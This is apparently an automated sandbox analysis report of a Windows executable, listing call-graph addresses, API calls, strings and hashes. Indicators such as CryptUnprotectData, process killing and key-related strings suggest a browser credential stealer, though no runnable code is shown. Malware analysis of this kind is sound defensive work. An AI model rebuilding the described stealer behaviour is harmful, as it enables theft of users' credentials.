38351->38353 38352->38351 38354 36bf80 38352->38354 38355 36bf91 38353->38355 38356 356070 41 API calls 38354->38356 38357 374a11 CatchGuardHandler 5 API calls 38355->38357 38356->38355 38358 36bfc4 38357->38358 38359 381089 38358->38359 38360 38109c ___std_exception_copy 38359->38360 38553 37e67a 38360->38553 38543->38104 38548->38283 38573 37e4d9 38553->38573 38574 37e4f1 38573->38574 38575 37e4de 38573->38575 38643 373af0 38644 373bd3 38643->38644 38650 373b0e 38643->38650 38645 35f110 41 API calls 38644->38645 38647 373be1 38645->38647 38646 373bea 38648 35f110 41 API calls 38646->38648 38649 373bf8 38648->38649 38650->38644 38650->38646 36334 35d8c1 36355 35d860 error_info_injector 36334->36355 36335 356f10 96 API calls 36335->36355 36336 35dff6 36542 37b1dd 39 API calls __CreateFrameInfo 36336->36542 36338 35dffb 36543 380fd8 36338->36543 36340 35e940 41 API calls 36340->36355 36342 35d9c3 SHGetFolderPathA 36342->36355 36344 360fc0 41 API calls 36344->36355 36345 35dc34 GetFileAttributesA 36345->36355 
36348 35dfe0 36535 374a11 36348->36535 36350 35dff2 36352 3664d0 41 API calls 36352->36355 36353 35f110 41 API calls 36353->36355 36355->36334 36355->36335 36355->36336 36355->36338 36355->36340 36355->36344 36355->36345 36355->36348 36355->36352 36355->36353 36356 3741e0 CreateToolhelp32Snapshot Process32FirstW 36355->36356 36369 35ce40 36355->36369 36446 356f10 36355->36446 36496 35ff80 36355->36496 36511 35eb40 36355->36511 36534 35e730 5 API calls CatchGuardHandler 36355->36534 36357 3743b6 CloseHandle Sleep 36356->36357 36366 374231 error_info_injector 36356->36366 36358 374a11 CatchGuardHandler 5 API calls 36357->36358 36360 3743d5 36358->36360 36360->36355 36362 3743db 36365 380fd8 39 API calls 36362->36365 36363 374393 Process32NextW 36363->36357 36363->36366 36364 37436d OpenProcess 36364->36363 36367 374383 TerminateProcess CloseHandle 36364->36367 36368 3743e0 36365->36368 36366->36362 36366->36363 36366->36364 36548 373990 36366->36548 36567 36eb70 36366->36567 36367->36363 36697 355dd0 36369->36697 36371 35ce78 36372 356f10 96 API calls 36371->36372 36373 35cea0 36372->36373 36706 35e940 36373->36706 36375 35cea7 36729 35f110 36375->36729 36377 35cec4 36378 35f110 41 API calls 36377->36378 36379 35cef6 36378->36379 36381 356f10 96 API calls 36379->36381 36421 35cf9a error_info_injector 36379->36421 36380 35f7b0 41 API calls 36382 35d096 FindFirstFileA 36380->36382 36383 35cf26 36381->36383 36444 35d0c3 error_info_injector 36382->36444 36384 35e940 41 API calls 36383->36384 36385 35cf2e 36384->36385 36386 35cf55 36385->36386 36387 35d79e 36385->36387 36392 356f10 96 API calls 36386->36392 37427 37b1dd 39 API calls __CreateFrameInfo 36387->37427 36390 35d7a3 36393 380fd8 39 API calls 36390->36393 36391 35d523 37280 36d5a0 36391->37280 36394 35cf6f 36392->36394 36395 35d7a8 36393->36395 36759 35f7b0 36394->36759 36397 380fd8 39 API calls 36395->36397 36400 35d7ad 36397->36400 36399 35d53f __CreateFrameInfo 36406 356f10 96 API calls 36399->36406 36403 
380fd8 39 API calls 36400->36403 36402 35d519 FindNextFileA 36402->36391 36402->36444 36405 35d7b2 36403->36405 36407 380fd8 39 API calls 36405->36407 36408 35d581 36406->36408 36409 35d7b7 36407->36409 37300 3564a0 36408->37300 36411 35eb40 41 API calls 36414 35d5d9 36411->36414 36412 35d0e8 36412->36400 36415 35d122 error_info_injector 36412->36415 36413 35d592 error_info_injector 36413->36405 36413->36411 37315 356560 GetTempPathA 36414->37315 36417 374a11 CatchGuardHandler 5 API calls 36415->36417 36420 35d798 36417->36420 36420->36355 36421->36380 36421->36390 36421->36400 36421->36412 36423 356f10 96 API calls 36435 35d688 error_info_injector 36423->36435 36425 35f7b0 41 API calls 36425->36444 36427 35d639 _Yarn __Getctype 36427->36435 37417 354400 36427->37417 36431 35d5fd 36431->36427 37425 37b078 39 API calls 2 library calls 36431->37425 36432 37b1b7 ___std_exception_copy 14 API calls 36432->36435 36434 35d62b 37426 37a0d0 66 API calls ___std_exception_copy 36434->37426 36435->36390 36435->36423 36436 35d72f 36435->36436 36437 35d71f Sleep 36435->36437 36438 37b1b7 ___std_exception_copy 14 API calls 36436->36438 36437->36435 36442 35d735 36438->36442 36440 356f10 96 API calls 36440->36444 36441 35e940 41 API calls 36441->36444 36442->36405 36442->36415 36443 35f110 41 API calls 36443->36444 36444->36390 36444->36391 36444->36395 36444->36402 36444->36425 36444->36440 36444->36441 36444->36443 36767 35ecd0 36444->36767 36772 35ed40 36444->36772 36777 359630 36444->36777 36467 356f2f _Yarn __CreateFrameInfo error_info_injector 36446->36467 36449 356fa7 36451 374c1c std::_Facet_Register 41 API calls 36449->36451 36452 356f3b _Yarn 36449->36452 36450 374c1c std::_Facet_Register 41 API calls 36450->36467 36451->36452 36452->36342 36455 37b1dd 39 API calls __FrameHandler3::FrameUnwindToState 36455->36467 36456 357265 lstrlenA 36456->36467 36457 380fd8 39 API calls 36457->36467 36458 357949 error_info_injector 36459 374a11 CatchGuardHandler 5 API calls 
36458->36459 36461 357960 36459->36461 36461->36342 36462 3572b1 GetProcessHeap HeapAlloc 36462->36467 36463 35f110 41 API calls 36463->36467 36464 357577 error_info_injector 36465 374a11 CatchGuardHandler 5 API calls 36464->36465 36469 357591 36465->36469 36466 35ecd0 41 API calls 36466->36467 36467->36446 36467->36449 36467->36450 36467->36452 36467->36455 36467->36456 36467->36457 36467->36458 36467->36462 36467->36463 36467->36464 36467->36466 36468 35734f GetProcessHeap HeapFree 36467->36468 36470 357349 CryptUnprotectData 36467->36470 36471 35ee10 41 API calls 36467->36471 36472 357c0b GetFileAttributesA 36467->36472 36473 356f10 85 API calls 36467->36473 36474 3585f9 GetFileAttributesA 36467->36474 36475 373c10 85 API calls 36467->36475 36476 35e940 41 API calls 36467->36476 36477 360fc0 41 API calls 36467->36477 36478 3591e1 GetFileAttributesA 36467->36478 36479 35f9e0 85 API calls 36467->36479 36480 35f970 41 API calls 36467->36480 36481 35edc0 39 API calls 36467->36481 36482 35e730 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 36467->36482 36483 35f990 85 API calls 36467->36483 36484 35f7b0 41 API calls 36467->36484 36485 3595cf error_info_injector 36467->36485 36487 35ff80 41 API calls 36467->36487 36488 356070 41 API calls 36467->36488 36490 35f8d0 41 API calls 36467->36490 36491 355340 46 API calls 36467->36491 36492 3558c0 20 API calls 36467->36492 36493 355ce0 6 API calls 36467->36493 36495 3558c0 20 API calls 36467->36495 37701 356060 41 API calls CatchGuardHandler 36467->37701 37702 355fc0 41 API calls 3 library calls 36467->37702 37703 360220 41 API calls Concurrency::cancel_current_task 36467->37703 37704 35fad0 36467->37704 37713 3664d0 41 API calls 4 library calls 36467->37713 36468->36467 36469->36342 36470->36467 36470->36468 36471->36467 36472->36467 36473->36467 36474->36467 36475->36467 36476->36467 36477->36467 36478->36467 36479->36467 36480->36467 36481->36467 
36482->36467 36483->36467 36484->36467 36486 374a11 CatchGuardHandler 5 API calls 36485->36486 36489 3595e6 36486->36489 36487->36467 36488->36467 36489->36342 36490->36467 36491->36467 36494 35786c GetProcessHeap HeapFree 36492->36494 36493->36467 36494->36467 36495->36467 36497 3600ce 36496->36497 36498 35ffab 36496->36498 36499 3600d3 36497->36499 37773 356060 41 API calls CatchGuardHandler 36497->37773 36502 35fff2 36498->36502 36503 36001c 36498->36503 37774 355fc0 41 API calls 3 library calls 36499->37774 36502->36499 36505 35fffd 36502->36505 36506 374c1c std::_Facet_Register 41 API calls 36503->36506 36509 360003 _Yarn 36503->36509 36504 380fd8 39 API calls 36507 3600dd 36504->36507 36508 374c1c std::_Facet_Register 41 API calls 36505->36508 36506->36509 36508->36509 36509->36504 36510 36008c _Yarn error_info_injector 36509->36510 36510->36355 36512 35eb68 36511->36512 36531 35ec65 36511->36531 36513 35ebc7 36512->36513 36514 35eb6f 36512->36514 36515 35ec4e 36512->36515 36516 35eb9b 36512->36516 36517 35ebf3 36512->36517 36521 374c1c std::_Facet_Register 41 API calls 36513->36521 36518 374c1c std::_Facet_Register 41 API calls 36514->36518 36519 374c1c std::_Facet_Register 41 API calls 36515->36519 36520 374c1c std::_Facet_Register 41 API calls 36516->36520 36517->36355 36522 35eb79 36518->36522 36523 35ec58 36519->36523 36524 35eba5 36520->36524 36525 35ebd1 36521->36525 37775 366230 36522->37775 37790 3659a0 41 API calls Concurrency::cancel_current_task 36523->37790 37780 3661a0 36524->37780 36529 35ee10 41 API calls 36525->36529 36533 35ebde 36529->36533 36531->36355 36533->36355 36534->36355 36536 374a1a IsProcessorFeaturePresent 36535->36536 36537 374a19 36535->36537 36539 374a5c 36536->36539 36537->36350 37819 374a1f SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 36539->37819 36541 374b3f 36541->36350 37820 380f14 39 API calls ___std_exception_copy 36543->37820 36546 380fe7 36546->36543 36547 395830 
error_info_injector 36546->36547 37821 380ff5 IsProcessorFeaturePresent 36546->37821 36547->36338 36549 3739da __CreateFrameInfo 36548->36549 36550 3739c5 36548->36550 36575 375c84 36549->36575 36552 3739d1 36550->36552 36553 373ada 36550->36553 36630 360f60 41 API calls 2 library calls 36552->36630 36631 35f560 41 API calls 36553->36631 36555 3739fe 36587 3743f0 36555->36587 36557 373adf 36559 380fd8 39 API calls 36557->36559 36560 373ae4 36559->36560 36561 36eb70 41 API calls 36562 373a92 36561->36562 36562->36557 36564 373abb error_info_injector 36562->36564 36565 374a11 CatchGuardHandler 5 API calls 36564->36565 36566 373ad4 36565->36566 36566->36366 36568 36ec0e 36567->36568 36572 36eb8f 36567->36572 36696 356060 41 API calls CatchGuardHandler 36568->36696 36570 36eb9b _Yarn 36570->36366 36571 36ec13 36572->36570 36695 360f60 41 API calls 2 library calls 36572->36695 36574 36ebe2 _Yarn 36574->36366 36576 375c90 __EH_prolog3 36575->36576 36632 375a93 36576->36632 36581 375cae 36646 375e0c 41 API calls std::locale::_Setgloballocale 36581->36646 36583 375d0c std::locale::_Init 36583->36555 36584 375cb6 36647 375bce 15 API calls 2 library calls 36584->36647 36586 375ccc 36638 375aeb 36586->36638 36588 375a93 std::_Lockit::_Lockit 7 API calls 36587->36588 36589 374416 36588->36589 36590 375a93 std::_Lockit::_Lockit 7 API calls 36589->36590 36596 374451 36589->36596 36592 374431 36590->36592 36591 374470 36593 375aeb std::_Lockit::~_Lockit 2 API calls 36591->36593 36594 375aeb std::_Lockit::~_Lockit 2 API calls 36592->36594 36595 374478 36593->36595 36594->36596 36597 374a11 CatchGuardHandler 5 API calls 36595->36597 36596->36591 36652 374c1c 36596->36652 36599 373a0d 36597->36599 36599->36561 36600 3744b9 36601 375a93 std::_Lockit::_Lockit 7 API calls 36600->36601 36602 3744e3 36601->36602 36603 374521 36602->36603 36604 37463c 36602->36604 36666 375d84 67 API calls 2 library calls 36603->36666 36674 37588a 41 API calls CallUnexpected 36604->36674 36607 374646 
36608 37452b 36667 375f39 40 API calls __Getctype 36608->36667 36610 374541 36668 375fa4 39 API calls 2 library calls 36610->36668 36612 374557 36669 375dcf 66 API calls std::_Locinfo::_Locinfo_ctor 36612->36669 36614 374582 36615 374592 36614->36615 36670 37b1b7 36614->36670 36617 3745a9 36615->36617 36618 37b1b7 ___std_exception_copy 14 API calls 36615->36618 36619 3745c0 36617->36619 36621 37b1b7 ___std_exception_copy 14 API calls 36617->36621 36618->36617 36620 3745d7 36619->36620 36622 37b1b7 ___std_exception_copy 14 API calls 36619->36622 36623 3745ee 36620->36623 36624 37b1b7 ___std_exception_copy 14 API calls 36620->36624 36621->36619 36622->36620 36625 374605 36623->36625 36626 37b1b7 ___std_exception_copy 14 API calls 36623->36626 36624->36623 36627 375aeb std::_Lockit::~_Lockit 2 API calls 36625->36627 36626->36625 36628 374617 36627->36628 36673 375c52 41 API calls std::_Facet_Register 36628->36673 36630->36549 36633 375aa2 36632->36633 36634 375aa9 36632->36634 36648 383fb8 6 API calls 2 library calls 36633->36648 36636 375aa7 36634->36636 36649 37616e EnterCriticalSection 36634->36649 36636->36586 36645 375de9 41 API calls 2 library calls 36636->36645 36639 375af5 36638->36639 36640 383fc6 36638->36640 36644 375b08 36639->36644 36650 37617c LeaveCriticalSection 36639->36650 36651 383fa1 LeaveCriticalSection 36640->36651 36643 383fcd 36643->36583 36644->36583 36645->36581 36646->36584 36647->36586 36648->36636 36649->36636 36650->36644 36651->36643 36654 374c21 36652->36654 36655 374c3b 36654->36655 36657 374c3d 36654->36657 36675 37b1d2 36654->36675 36684 381349 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 36654->36684 36655->36600 36658 374c47 std::_Facet_Register 36657->36658 36659 355fc0 Concurrency::cancel_current_task 36657->36659 36685 37650e RaiseException 36658->36685 36682 37650e RaiseException 36659->36682 36662 355fdc 36683 37627c 40 API calls ___std_exception_copy 36662->36683 36663 37517e 36665 356003 36665->36600 
36666->36608 36667->36610 36668->36612 36669->36614 36688 38524e 36670->36688 36673->36591 36674->36607 36681 38665c __Wcrtomb 36675->36681 36676 38669a 36687 37b13c 14 API calls __Wcrtomb 36676->36687 36678 386685 RtlAllocateHeap 36679 386698 36678->36679 36678->36681 36679->36654 36681->36676 36681->36678 36686 381349 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 36681->36686 36682->36662 36683->36665 36684->36654 36685->36663 36686->36681 36687->36679 36689 385259 RtlFreeHeap 36688->36689 36690 37b1cf 36688->36690 36689->36690 36691 38526e GetLastError 36689->36691 36690->36615 36692 38527b __dosmaperr 36691->36692 36694 37b13c 14 API calls __Wcrtomb 36692->36694 36694->36690 36695->36574 36696->36571 36698 355ddf __Getctype 36697->36698 36699 355e52 36698->36699 37428 354550 15 API calls 2 library calls 36698->37428 36699->36371 36701 355e45 36702 37b1b7 ___std_exception_copy 14 API calls 36701->36702 36702->36699 36703 355e0a 36703->36701 36704 355e5b 36703->36704 36705 354400 69 API calls 36703->36705 36704->36371 36705->36701 36707 35e950 36706->36707 36714 35e973 36706->36714 36708 374c1c std::_Facet_Register 41 API calls 36707->36708 36710 35e95a 36708->36710 36709 35eac0 37434 37b1dd 39 API calls __CreateFrameInfo 36709->37434 36712 374c1c std::_Facet_Register 41 API calls 36710->36712 36712->36714 36713 35eac5 37435 356100 41 API calls 36713->37435 36714->36709 36719 35e992 36714->36719 36716 35ea01 36717 374c1c std::_Facet_Register 41 API calls 36716->36717 36720 35ea0d 36717->36720 36718 380fd8 39 API calls 36721 35eacf 36718->36721 36719->36713 36719->36716 36728 35ea72 36719->36728 37429 35ef10 36720->37429 36724 35f110 41 API calls 36721->36724 36727 35eae2 36724->36727 36725 35eaaa error_info_injector 36725->36375 36727->36375 36728->36718 36728->36725 36733 35f133 36729->36733 36736 35f1cd 36729->36736 36730 35f3a5 36731 35f410 error_info_injector 36730->36731 36741 35f3d2 36730->36741 36742 35f409 36730->36742 36747 35f417 
36730->36747 36732 374a11 CatchGuardHandler 5 API calls 36731->36732 36735 35f4bf 36732->36735 36733->36731 36734 35f4ca 36733->36734 36755 35f168 36733->36755 37445 35f5e0 41 API calls 36733->37445 37454 35f560 41 API calls 36734->37454 36735->36377 36736->36730 36736->36731 36736->36734 36746 35f210 36736->36746 37446 35f5e0 41 API calls 36736->37446 36739 35f39d 37449 35f570 36739->37449 36745 3603b0 41 API calls 36741->36745 36748 35f570 39 API calls 36742->36748 36754 35f3e1 error_info_injector 36745->36754 36746->36755 37447 3639e0 41 API calls 36746->37447 36747->36731 36750 35f4c5 36747->36750 36748->36731 36751 380fd8 39 API calls 36750->36751 36751->36734 36753 35ead0 41 API calls 36753->36755 36757 374a11 CatchGuardHandler 5 API calls 36754->36757 36755->36739 36755->36753 37437 3603b0 36755->37437 37448 3639e0 41 API calls 36755->37448 36758 35f403 36757->36758 36758->36377 36760 35f7d0 36759->36760 36760->36760 37458 356060 41 API calls CatchGuardHandler 36760->37458 36762 35f8c3 37459 355fc0 41 API calls 3 library calls 36762->37459 36764 35f8c8 36765 380fd8 39 API calls 36764->36765 36766 35f8cd 36765->36766 36768 35ece0 36767->36768 36768->36768 36769 35ff80 41 API calls 36768->36769 36770 35ecf8 _Yarn 36768->36770 36771 35ed38 36769->36771 36770->36444 36771->36444 36773 35ed55 36772->36773 36774 35ff80 41 API calls 36773->36774 36776 35ed65 _Yarn 36773->36776 36775 35eda9 36774->36775 36775->36444 36776->36444 36778 356f10 96 API calls 36777->36778 36779 359682 36778->36779 36780 35e940 41 API calls 36779->36780 36781 359689 36780->36781 36782 35b446 36781->36782 36784 356f10 96 API calls 36781->36784 37611 37b1dd 39 API calls __CreateFrameInfo 36782->37611 36787 3596cc 36784->36787 36785 35b44b 36786 380fd8 39 API calls 36785->36786 36788 35b450 36786->36788 36789 35f7b0 41 API calls 36787->36789 37612 37b1dd 39 API calls __CreateFrameInfo 36788->37612 36791 3596de 36789->36791 37460 360fc0 36791->37460 36792 35b455 36794 380fd8 39 API calls 
36792->36794 36795 35b45a 36794->36795 37613 37b1dd 39 API calls __CreateFrameInfo 36795->37613 36797 3596fa error_info_injector 36797->36785 36798 356f10 96 API calls 36797->36798 36800 3597ae 36798->36800 36799 35b45f 36801 380fd8 39 API calls 36799->36801 36802 35e940 41 API calls 36800->36802 36803 35b464 36801->36803 36804 3597b5 36802->36804 37614 37b1dd 39 API calls __CreateFrameInfo 36803->37614 36804->36788 36808 356f10 96 API calls 36804->36808 36806 35b469 36807 380fd8 39 API calls 36806->36807 36809 35b46e 36807->36809 36810 3597f8 36808->36810 37615 37b1dd 39 API calls __CreateFrameInfo 36809->37615 36812 35f7b0 41 API calls 36810->36812 36815 35980a 36812->36815 36813 35b473 36814 380fd8 39 API calls 36813->36814 36817 35b478 36814->36817 36816 360fc0 41 API calls 36815->36816 36823 359823 error_info_injector 36816->36823 37616 37b1dd 39 API calls __CreateFrameInfo 36817->37616 36819 35b47d 36820 380fd8 39 API calls 36819->36820 36821 35b4a0 36820->36821 36826 356f10 96 API calls 36821->36826 36822 356f10 96 API calls 36824 3598d7 36822->36824 36823->36792 36823->36822 36825 35e940 41 API calls 36824->36825 36827 3598de 36825->36827 36828 35b4ff 36826->36828 36827->36795 36831 356f10 96 API calls 36827->36831 36829 35e940 41 API calls 36828->36829 36830 35b506 36829->36830 36832 35ccba 36830->36832 36837 356f10 96 API calls 36830->36837 36834 359921 36831->36834 37617 37b1dd 39 API calls __CreateFrameInfo 36832->37617 36836 35f7b0 41 API calls 36834->36836 36835 35ccbf 36838 380fd8 39 API calls 36835->36838 36839 359933 36836->36839 36840 35b549 36837->36840 36842 35ccc4 36838->36842 36843 360fc0 41 API calls 36839->36843 36841 35f7b0 41 API calls 36840->36841 36844 35b558 36841->36844 37618 37b1dd 39 API calls __CreateFrameInfo 36842->37618 36849 35994c error_info_injector 36843->36849 36846 360fc0 41 API calls 36844->36846 36859 35b56e error_info_injector 36846->36859 36847 35ccc9 36848 380fd8 39 API calls 36847->36848 36851 35ccce 36848->36851 
36849->36799 36850 356f10 96 API calls 36849->36850 36852 359a00 36850->36852 37619 37b1dd 39 API calls __CreateFrameInfo 36851->37619 36855 35e940 41 API calls 36852->36855 36854 356f10 96 API calls 36857 35b613 36854->36857 36858 359a07 36855->36858 36856 35ccd3 36860 380fd8 39 API calls 36856->36860 36861 35e940 41 API calls 36857->36861 36858->36803 36866 356f10 96 API calls 36858->36866 36859->36835 36859->36854 36862 35ccd8 36860->36862 36864 35b61a 36861->36864 37620 37b1dd 39 API calls __CreateFrameInfo 36862->37620 36864->36842 36871 356f10 96 API calls 36864->36871 36865 35ccdd 36867 380fd8 39 API calls 36865->36867 36868 359a4a 36866->36868 36870 35ccfb 36867->36870 36869 35f7b0 41 API calls 36868->36869 36872 359a5c 36869->36872 36873 35b65d 36871->36873 36874 360fc0 41 API calls 36872->36874 36875 35f7b0 41 API calls 36873->36875 36880 359a75 error_info_injector 36874->36880 36876 35b66c 36875->36876 36877 360fc0 41 API calls 36876->36877 36884 35b682 error_info_injector 36877->36884 36878 356f10 96 API calls 36879 359b29 36878->36879 36881 35e940 41 API calls 36879->36881 36880->36806 36880->36878 36883 359b30 36881->36883 36882 356f10 96 API calls 36885 35b727 36882->36885 36883->36809 36888 356f10 96 API calls 36883->36888 36884->36847 36884->36882 36886 35e940 41 API calls 36885->36886 36887 35b72e 36886->36887 36887->36851 36890 356f10 96 API calls 36887->36890 36889 359b73 36888->36889 36891 35f7b0 41 API calls 36889->36891 36892 35b771 36890->36892 36893 359b85 36891->36893 36894 35f7b0 41 API calls 36892->36894 36895 360fc0 41 API calls 36893->36895 36896 35b780 36894->36896 36899 359b9e error_info_injector 36895->36899 36897 360fc0 41 API calls 36896->36897 36905 35b796 error_info_injector 36897->36905 36898 356f10 96 API calls 36900 359c52 36898->36900 36899->36813 36899->36898 36902 35e940 41 API calls 36900->36902 36901 356f10 96 API calls 36903 35b83b 36901->36903 36904 359c59 36902->36904 36906 35e940 41 API calls 36903->36906 
36904->36817 36908 356f10 96 API calls 36904->36908 36905->36856 36905->36901 36907 35b842 36906->36907 36907->36862 36911 356f10 96 API calls 36907->36911 36909 359c9c 36908->36909 36910 35f7b0 41 API calls 36909->36910 36912 359cae 36910->36912 36913 35b885 36911->36913 36914 360fc0 41 API calls 36912->36914 36915 35f7b0 41 API calls 36913->36915 36918 359cc7 error_info_injector 36914->36918 36916 35b894 36915->36916 36917 360fc0 41 API calls 36916->36917 36921 35b8aa error_info_injector 36917->36921 36918->36819 36922 35a134 36918->36922 37477 35ee10 36918->37477 36920 359d7b 37494 373c10 36920->37494 36921->36865 36924 35ee10 41 API calls 36921->36924 36929 35bd90 36921->36929 36925 35ee10 41 API calls 36922->36925 36936 35a5c1 36922->36936 36927 35b949 36924->36927 36930 35a153 36925->36930 36928 373c10 96 API calls 36927->36928 36932 35b955 36928->36932 36933 35ee10 41 API calls 36929->36933 36943 35c2c3 36929->36943 36934 373c10 96 API calls 36930->36934 36931 35f990 96 API calls 36935 359d99 36931->36935 36937 356f10 96 API calls 36932->36937 36938 35bdaf 36933->36938 36939 35a15f 36934->36939 36940 35f9e0 96 API calls 36935->36940 36941 35ee10 41 API calls 36936->36941 36950 35aa4e 36936->36950 36942 35b97c 36937->36942 36944 373c10 96 API calls 36938->36944 36945 356f10 96 API calls 36939->36945 36946 359da6 36940->36946 36947 35a5e0 36941->36947 36949 35e940 41 API calls 36942->36949 36951 35ee10 41 API calls 36943->36951 36967 35c727 36943->36967 36952 35bdbb 36944->36952 36953 35a186 36945->36953 36954 356070 41 API calls 36946->36954 36948 373c10 96 API calls 36947->36948 36955 35a5ec 36948->36955 36956 35b983 36949->36956 36957 35ee10 41 API calls 36950->36957 36977 35aedb 36950->36977 36958 35c2e2 36951->36958 36959 356f10 96 API calls 36952->36959 36960 35e940 41 API calls 36953->36960 36961 359dbd 36954->36961 36962 356f10 96 API calls 36955->36962 36956->36832 36981 356f10 96 API calls 36956->36981 36963 35aa6d 36957->36963 36964 373c10 96 API 
calls 36958->36964 36965 35bde2 36959->36965 36966 35a18d 36960->36966 36969 35f990 96 API calls 36961->36969 36972 35a613 36962->36972 36974 373c10 96 API calls 36963->36974 36975 35c2ee 36964->36975 36976 35e940 41 API calls 36965->36976 36966->36782 36986 356f10 96 API calls 36966->36986 36968 35cb8b 36967->36968 36970 35ee10 41 API calls 36967->36970 36973 35ee10 41 API calls 36968->36973 36971 359dcf 36969->36971 36978 35c746 36970->36978 36979 35f9e0 96 API calls 36971->36979 36980 35e940 41 API calls 36972->36980 37030 35cb98 error_info_injector 36973->37030 36982 35aa79 36974->36982 36983 356f10 96 API calls 36975->36983 36984 35bde9 36976->36984 36985 35ee10 41 API calls 36977->36985 36997 35b14a 36977->36997 36987 373c10 96 API calls 36978->36987 36988 359ddc 36979->36988 36989 35a61a 36980->36989 36990 35b9ba 36981->36990 36991 356f10 96 API calls 36982->36991 36992 35c315 36983->36992 36984->36832 37006 356f10 96 API calls 36984->37006 36993 35aefa 36985->36993 36995 35a1d0 36986->36995 36996 35c752 36987->36996 37007 35ff80 41 API calls 36988->37007 37015 359ded 36988->37015 36989->36782 37016 356f10 96 API calls 36989->37016 36998 356070 41 API calls 36990->36998 36999 35aaa0 36991->36999 37000 35e940 41 API calls 36992->37000 36994 373c10 96 API calls 36993->36994 37001 35af06 36994->37001 37002 356070 41 API calls 36995->37002 37003 356f10 96 API calls 36996->37003 37008 35ee10 41 API calls 36997->37008 37044 35b2a2 error_info_injector 36997->37044 37009 35b9cb 36998->37009 37004 35e940 41 API calls 36999->37004 37005 35c31d 37000->37005 37010 356f10 96 API calls 37001->37010 37011 35a1e1 37002->37011 37012 35c779 37003->37012 37013 35aaa7 37004->37013 37005->36832 37031 356f10 96 API calls 37005->37031 37014 35be20 37006->37014 37007->37015 37017 35b169 37008->37017 37018 356f10 96 API calls 37009->37018 37019 35af2d 37010->37019 37020 356f10 96 API calls 37011->37020 37021 35e940 41 API calls 37012->37021 37013->36782 37039 356f10 96 API calls 
APIs
  • Part of subcall function 0035CE40: NtQueryAttributesFile.NTDLL ref: 0035CDDD
  • Part of subcall function 00373C10: NtCreateFile.NTDLL ref: 00373D3F
• GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0035A127
• HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0035A12E
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035A5B4
• HeapFree.KERNEL32(00000000,?,00000001), ref: 0035A5BB
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035AA41
• HeapFree.KERNEL32(00000000,?,00000001), ref: 0035AA48
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035AECE
• HeapFree.KERNEL32(00000000,?,00000001), ref: 0035AED5
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 0035B13D
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0035B295
• RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000002), ref: 0035B29C
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035BD80
• HeapFree.KERNEL32(00000000,?,00000001), ref: 0035BD87
  • Part of subcall function 00356F10: Concurrency::cancel_current_task.LIBCPMT ref: 00356FE5
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035C2B6
• HeapFree.KERNEL32(00000000,?,00000001), ref: 0035C2BD
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035C71A
• RtlFreeHeap.NTDLL(00000000,?,00000001), ref: 0035C721
• RtlFreeHeap.NTDLL(00000000), ref: 0035B144
  • Part of subcall function 00373C10: GetProcessHeap.KERNEL32(?,?,?), ref: 00373D5F
  • Part of subcall function 00373C10: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00373D69
  • Part of subcall function 00373C10: NtReadFile.NTDLL ref: 00373D9B
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035CB7E
• HeapFree.KERNEL32(00000000,?,00000001), ref: 0035CB85
• FindFirstFileA.KERNELBASE ref: 0035D0B2
• FindNextFileA.KERNELBASE(?,?), ref: 0035D519
• Sleep.KERNEL32(00000BB8,?,00000000,?,?), ref: 0035D724
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Heap$Process$Free$File$Find$AllocateAttributesConcurrency::cancel_current_taskCreateFirstNextQueryReadSleep
• String ID: NCo
• API String ID: 2388217530-2199656919
• Opcode ID: 39b5a8b56fdc6cc73721cd2eb8889f97a03317c527c541cb6c0adea28f3b1d4b
• Instruction ID: 5397dd1d02cbd0a9d90660b23c5c4565fb3d4122330477f9fe8c228945ebe266
• Opcode Fuzzy Hash: 39b5a8b56fdc6cc73721cd2eb8889f97a03317c527c541cb6c0adea28f3b1d4b
• Instruction Fuzzy Hash: 9B63C471A102148FEB1EDF24CC95FADB772BF45305F1082D8E8096B6A2DB749AC98F51
Uniqueness

Uniqueness Score: -1.00%

APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 00356FE5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: MyApp/1.0$NCo$\Ext\$\key$en_k$inc$os_c
• API String ID: 118556049-2782671678
• Opcode ID: c41097598d98846a03815615bf176bae513b03423ccf49468bbc2743a67f6f66
